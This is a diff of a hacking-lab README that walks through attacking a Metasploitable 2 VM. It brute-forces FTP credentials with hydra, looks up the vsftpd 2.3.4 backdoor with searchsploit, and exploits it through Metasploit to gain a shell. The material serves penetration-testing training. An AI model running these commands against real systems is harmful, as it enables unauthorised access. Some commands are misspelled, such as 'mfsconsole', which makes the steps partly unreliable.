thatoneblerd/Hacking-Lab/README.md

 ### It’s Exploit Time!

 1. Exploit port 21 FTP
-    1. Review MS2.txt - Notice the service (vsftpd 2.3.4) - it’s outdated and thus vulnerable for exploiting.
+    1. Review MS2.txt - Notice the service (vsftpd 2.3.4) - it’s outdated and thus vulnerable for exploiting. 😈
     2. Utilize the user/password lists to gain access.

-In terminal:
-        1. hydra -L Users.txt -P Passwords.txt {IP of MS2 VM}
+        hydra -L Users.txt -P Passwords.txt {IP of MS2 VM}

         This list will show the logins/passwords from your list that match.

+    3. Login to MS2 -- sign in with user/password credentials

+        ftp {IP of MS2 VM}

+    4. Confirm in MS2 directory

+        ls or ifconfig

+    5. Exit out of MS2 vm:

+        bye

+    6. Use searchsploit tool to see vulnerabilities associated with version (2 should appear).

+        searchsploit vsftpd 2.3.4

+    7. Enter into Metasploit framework.
+Search

+        mfsconsole > search vsftpd 2.3.4

+    8. Use exploit shown and view options.

+        use 0

+        show options

+    9. Set the target host.

+        set rhosts 10.0.200.7 > show options

+    1-2-3… exploit … once you enter this, the terminal should now be MS2.

-    3. Confirm you are on : ifconfig + whoami
+    Confirm you are on MS2 : ifconfig + whoami